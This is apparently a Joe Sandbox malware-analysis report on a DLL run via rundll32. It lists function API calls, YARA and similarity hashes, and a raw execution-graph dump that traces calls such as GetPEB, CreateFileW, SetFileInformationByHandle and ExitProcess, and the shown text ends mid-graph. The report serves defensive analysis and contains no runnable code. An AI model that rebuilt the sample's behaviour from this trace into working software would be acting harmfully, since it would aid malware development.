                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      • Opcode ID: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction ID: 8d1cfe8ad11ec7d0de67206570733d2bfe4fd9a2d1bcb630a2e9799106cb1609
                                                                                                                      • Opcode Fuzzy Hash: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction Fuzzy Hash: F0E0ED318942B4CBEB04EB20EDC83993BE8FB46305F524526D04693165DF346C99DE62
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                      • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                      • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
                                                                                                                      • Opcode ID: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction ID: 642a70e52bf11b7de8cb7bbdb6da5a8b8236a488639b363106a5e3ee5626d218
                                                                                                                      • Opcode Fuzzy Hash: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction Fuzzy Hash: B701B971A10118BFDF09DB74DD86AEE73B8DF04B01F0105E9EA02DB140EEB1EB448661
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1078
                                                                                                                      Total number of Limit Nodes:15
                                                                                                                      execution_graph 5219 226ed6 5220 226fda 5219->5220 5221 22bb4b 2 API calls 5220->5221 5226 22701b 5220->5226 5222 226ff1 5221->5222 5227 239861 5222->5227 5225 22ae03 GetPEB 5225->5226 5228 23987e 5227->5228 5229 227003 5228->5229 5231 235c4a 5228->5231 5229->5225 5232 235c66 5231->5232 5233 222d9f GetPEB 5232->5233 5234 235ceb 5233->5234 5234->5228 5173 2399aa 5179 239f06 5173->5179 5175 23a129 5176 2412a8 GetPEB 5176->5179 5177 23a12b 5178 234dad 2 API calls 5177->5178 5178->5175 5179->5175 5179->5176 5179->5177 5180 2268de GetPEB 5179->5180 5181 234fa8 GetPEB 5179->5181 5182 233512 2 API calls 5179->5182 5183 23e938 2 API calls 5179->5183 5184 23fc96 2 API calls 5179->5184 5186 2257ce 5179->5186 5190 227519 5179->5190 5180->5179 5181->5179 5182->5179 5183->5179 5184->5179 5187 2257fc 5186->5187 5188 222d9f GetPEB 5187->5188 5189 225878 5188->5189 5189->5179 5191 22752c 5190->5191 5192 222d9f GetPEB 5191->5192 5193 22759a 5192->5193 5193->5179 5194 23d3c8 5195 234fa8 GetPEB 5194->5195 5196 23d635 5195->5196 5197 23fc96 2 API calls 5196->5197 5198 23d64b 5197->5198 5199 23d6b2 5198->5199 5200 22ab66 2 API calls 5198->5200 5201 23d669 5200->5201 5202 22e7ce GetPEB 5201->5202 5203 23d692 5202->5203 5204 22ae03 GetPEB 5203->5204 5205 23d6a1 5204->5205 5206 22bab0 2 API calls 5205->5206 5206->5199 5207 22194c 5217 221973 5207->5217 5208 223bf8 GetPEB 5208->5217 5209 23baea GetPEB 5209->5217 5210 221f7e 5211 238c35 GetPEB 5210->5211 5212 221f7c 5211->5212 5213 23f7fc GetPEB 5213->5217 5214 22ab66 RtlAllocateHeap GetPEB 5214->5217 5215 22e7ce GetPEB 5215->5217 5216 221950 2 API calls 5216->5217 5217->5208 5217->5209 5217->5210 5217->5212 5217->5213 5217->5214 5217->5215 5217->5216 5218 22ae03 GetPEB 5217->5218 5218->5217 3918 23c82c 3923 241b54 3918->3923 3920 23c8a7 3960 233cbb 3920->3960 3922 23c8b7 3957 242dac 3923->3957 3924 22ebf2 RtlAllocateHeap GetPEB 3924->3957 3938 242e25 3938->3920 3941 24365e 4176 223fb8 3941->4176 3947 2268de GetPEB 3947->3957 3952 242e0a 4033 239186 3952->4033 3954 23eae6 RtlAllocateHeap GetPEB 3954->3957 3957->3924 3957->3938 3957->3941 3957->3947 3957->3952 3957->3954 3958 22ae03 GetPEB 3957->3958 3963 23b391 3957->3963 3974 232bf6 3957->3974 3987 22f93d 3957->3987 3997 2374dd 3957->3997 4011 23be8c 3957->4011 4019 230f7b 3957->4019 4023 2270ed 3957->4023 4043 22e243 3957->4043 4053 226083 3957->4053 4063 22b186 3957->4063 4068 2283a1 3957->4068 4071 234b56 3957->4071 4077 22911a 3957->4077 4089 23d8d7 3957->4089 4101 225e0b 3957->4101 4105 22c309 3957->4105 4114 23129c 3957->4114 4121 22ae9a 3957->4121 4126 226c29 3957->4126 4131 23ebff 3957->4131 4140 2304b8 3957->4140 4147 22c24a 3957->4147 4151 222830 3957->4151 4162 22fd8c 3957->4162 4166 22b821 3957->4166 4173 22f435 3957->4173 3958->3957 3961 222d9f GetPEB 3960->3961 3962 233d36 ExitProcess 3961->3962 3962->3922 3971 23b793 3963->3971 3965 23b986 3965->3957 3967 23b988 4199 234dad 3967->4199 3971->3965 3971->3967 4191 225d65 3971->4191 4195 23e938 3971->4195 4203 22ab66 3971->4203 4207 22e7ce 3971->4207 4211 22ae03 3971->4211 4215 23bbb2 3971->4215 3985 233273 3974->3985 3975 22ab66 2 API calls 3975->3985 3977 233400 3979 23e689 2 API calls 3977->3979 3980 23341c 3979->3980 3980->3957 3985->3975 3985->3977 3985->3980 3986 22ae03 GetPEB 3985->3986 4274 23ee94 3985->4274 4285 230188 3985->4285 4289 22eb36 3985->4289 4293 22ea7b 3985->4293 4297 23e689 3985->4297 4301 23bdb5 3985->4301 3986->3985 3994 22fc5c 3987->3994 3988 22fd67 4338 23e498 3988->4338 3989 22fd65 3989->3957 3993 22ab66 2 API calls 3993->3994 3994->3988 3994->3989 3994->3993 3995 22e7ce GetPEB 3994->3995 3996 22ae03 GetPEB 3994->3996 4324 228d95 3994->4324 4348 2412a8 3994->4348 3995->3994 3996->3994 4009 2379ea 3997->4009 3999 237b7e 4002 2268de GetPEB 3999->4002 4000 237b5f 4392 227027 4000->4392 4001 233512 RtlAllocateHeap GetPEB 4001->4009 4004 237b99 4002->4004 4007 2268de GetPEB 4004->4007 4005 22ab66 2 API calls 4005->4009 4006 237b5d 4006->3957 4007->4006 4009->3999 4009->4000 4009->4001 4009->4005 4009->4006 4010 22ae03 GetPEB 4009->4010 4384 230eda 4009->4384 4388 22c795 4009->4388 4010->4009 4014 23c16a 4011->4014 4013 23bbb2 GetPEB 4013->4014 4014->4013 4015 23e938 2 API calls 4014->4015 4016 234dad 2 API calls 4014->4016 4017 2412a8 GetPEB 4014->4017 4018 23c297 4014->4018 4396 23bc49 4014->4396 4015->4014 4016->4014 4017->4014 4018->3957 4021 230f95 4019->4021 4020 22ec9b RtlAllocateHeap GetPEB LoadLibraryW 4020->4021 4021->4020 4022 231099 4021->4022 4022->3957 4026 2273a5 4023->4026 4025 22ea7b 2 API calls 4025->4026 4026->4025 4027 23e689 2 API calls 4026->4027 4028 22eb36 2 API calls 4026->4028 4029 2274d5 4026->4029 4031 233512 2 API calls 4026->4031 4032 2274d3 4026->4032 4400 22e86a 4026->4400 4027->4026 4028->4026 4030 2412a8 GetPEB 4029->4030 4030->4032 4031->4026 4032->3957 4042 2391a1 4033->4042 4034 22ea7b 2 API calls 4034->4042 4035 23981f 4415 229700 4035->4415 4036 22ab66 RtlAllocateHeap GetPEB 4036->4042 4037 2396a3 4037->3938 4039 23bdb5 GetPEB 4039->4042 4041 22ae03 GetPEB 4041->4042 4042->4034 4042->4035 4042->4036 4042->4037 4042->4039 4042->4041 4411 225f83 4042->4411 4044 22e562 4043->4044 4045 22e702 4044->4045 4048 22e700 4044->4048 4051 2268de GetPEB 4044->4051 4429 22f4bd 4044->4429 4433 23e35a 4044->4433 4436 23561f 4044->4436 4443 22bc8a 4044->4443 4447 22fff2 4045->4447 4048->3957 4051->4044 4061 2260b9 4053->4061 4056 2268de GetPEB 4056->4061 4058 2268c5 4058->3957 4059 241310 GetPEB 4059->4061 4061->4056 4061->4058 4061->4059 4455 232753 4061->4455 4465 236864 4061->4465 4483 221f9b 4061->4483 4493 22bd0f 4061->4493 4502 237bca 4061->4502 4665 24074a 4063->4665 4069 225e0b GetPEB 4068->4069 4070 228405 4069->4070 4070->3957 4074 234c7f 4071->4074 4073 234d5e 4073->3957 4074->4073 4672 234fa8 4074->4672 4676 22c706 4074->4676 4679 241993 4074->4679 4085 229139 4077->4085 4078 233512 2 API calls 4078->4085 4084 2295bc 4084->3957 4085->4078 4085->4084 4717 226a1f 4085->4717 4724 235040 4085->4724 4732 23a429 4085->4732 4744 22472e 4085->4744 4765 222fa1 4085->4765 4786 227b82 4085->4786 4798 230946 4085->4798 4806 2288f4 4085->4806 4092 23e021 4089->4092 4090 23ba68 GetPEB 4090->4092 4091 22ea7b 2 API calls 4091->4092 4092->4090 4092->4091 4094 23e28e 4092->4094 4096 23e28c 4092->4096 4097 22ab66 RtlAllocateHeap GetPEB 4092->4097 4099 23bdb5 GetPEB 4092->4099 4100 22ae03 GetPEB 4092->4100 4923 228786 4092->4923 4927 23c2ce 4092->4927 4931 227af8 4094->4931 4096->3957 4097->4092 4099->4092 4100->4092 4102 225e24 4101->4102 4103 222d9f GetPEB 4102->4103 4104 225ea8 4103->4104 4104->3957 4111 22c589 4105->4111 4106 22c651 4935 221950 4106->4935 4107 22c64f 4107->3957 4109 234fa8 GetPEB 4109->4111 4110 22ab66 2 API calls 4110->4111 4111->4106 4111->4107 4111->4109 4111->4110 4112 22e7ce GetPEB 4111->4112 4113 22ae03 GetPEB 4111->4113 4112->4111 4113->4111 4116 2312be 4114->4116 4115 231758 4117 23f88f GetPEB 4115->4117 4116->4115 4118 231756 4116->4118 4119 23f88f GetPEB 4116->4119 4120 233512 2 API calls 4116->4120 4117->4118 4118->3957 4119->4116 4120->4116 4123 22afb9 4121->4123 4124 22aff1 4123->4124 4959 223d8a 4123->4959 4963 235a5c 4123->4963 4124->3957 4127 226d2b 4126->4127 4129 233512 2 API calls 4127->4129 4130 226d76 4127->4130 4967 23a156 4127->4967 4129->4127 4130->3957 4137 23ec1b 4131->4137 4133 23ede9 4134 2268de GetPEB 4133->4134 4136 23ede7 4134->4136 4135 233512 2 API calls 4135->4137 4136->3957 4137->4133 4137->4135 4137->4136 5000 240d5b 4137->5000 5010 23ee11 4137->5010 5014 226d80 4137->5014 4143 230740 4140->4143 4141 23e689 GetPEB CloseServiceHandle 4141->4143 4142 230896 4142->3957 4143->4141 4143->4142 4144 222e96 2 API calls 4143->4144 4145 22eb36 2 API calls 4143->4145 5110 22c67d 4143->5110 4144->4143 4145->4143 4148 22c263 4147->4148 4149 222d9f GetPEB 4148->4149 4150 22c2fe 4149->4150 4150->3957 4152 24074a GetPEB 4151->4152 4160 222c36 4152->4160 4153 222d70 4155 228d95 2 API calls 4153->4155 4154 222d6e 4154->3957 4155->4154 4156 22ab66 RtlAllocateHeap GetPEB 4156->4160 4157 225ae2 GetPEB 4157->4160 4158 22e7ce GetPEB 4158->4160 4159 23d37b GetPEB 4159->4160 4160->4153 4160->4154 4160->4156 4160->4157 4160->4158 4160->4159 4161 22ae03 GetPEB 4160->4161 4161->4160 4164 22ff04 4162->4164 4163 225ae2 GetPEB 4163->4164 4164->4163 4165 22ffeb 4164->4165 4165->3957 4169 22b981 4166->4169 4167 22b9dc 4170 234eff GetPEB 4167->4170 4168 233512 2 API calls 4168->4169 4169->4167 4169->4168 4172 22b9da 4169->4172 5114 2311fc 4169->5114 4170->4172 4172->3957 4174 233512 2 API calls 4173->4174 4175 22f4a9 4174->4175 4175->3957 4186 22436c 4176->4186 4177 22ab66 2 API calls 4177->4186 4179 22e7ce GetPEB 4179->4186 4181 2304b8 4 API calls 4181->4186 4182 2243a0 4185 234fa8 GetPEB 4182->4185 4183 22ae03 GetPEB 4183->4186 4184 228d95 2 API calls 4184->4186 4188 2243b8 4185->4188 4186->4177 4186->4179 4186->4181 4186->4182 4186->4183 4186->4184 4187 2244f5 4186->4187 5122 2244fa 4186->5122 5129 2341a7 4186->5129 4187->4187 5118 225b6b 4188->5118 4192 225d87 4191->4192 4219 222d9f 4192->4219 4196 23e968 4195->4196 4197 222d9f GetPEB 4196->4197 4198 23e9d0 CreateFileW 4197->4198 4198->3971 4200 234dc4 4199->4200 4201 222d9f GetPEB 4200->4201 4202 234e57 CloseHandle 4201->4202 4202->3965 4204 22ab80 4203->4204 4249 233512 4204->4249 4206 22ac0f 4206->3971 4206->4206 4208 22e7f3 4207->4208 4261 22c1dc 4208->4261 4212 22ae16 4211->4212 4264 2268de 4212->4264 4216 23bbc2 4215->4216 4217 222d9f GetPEB 4216->4217 4218 23bc3d 4217->4218 4218->3971 4220 222e80 SetFileInformationByHandle 4219->4220 4221 222e5b 4219->4221 4220->3971 4225 23c761 4221->4225 4223 222e6a 4228 22f2c1 4223->4228 4232 23d374 GetPEB 4225->4232 4227 23c7f2 4227->4223 4230 22f2e7 4228->4230 4229 22f3fd 4229->4220 4230->4229 4233 22c850 4230->4233 4232->4227 4234 22c9c2 4233->4234 4241 2359b7 4234->4241 4237 22ca07 4239 22ca3a 4237->4239 4240 22f2c1 GetPEB 4237->4240 4239->4229 4240->4239 4242 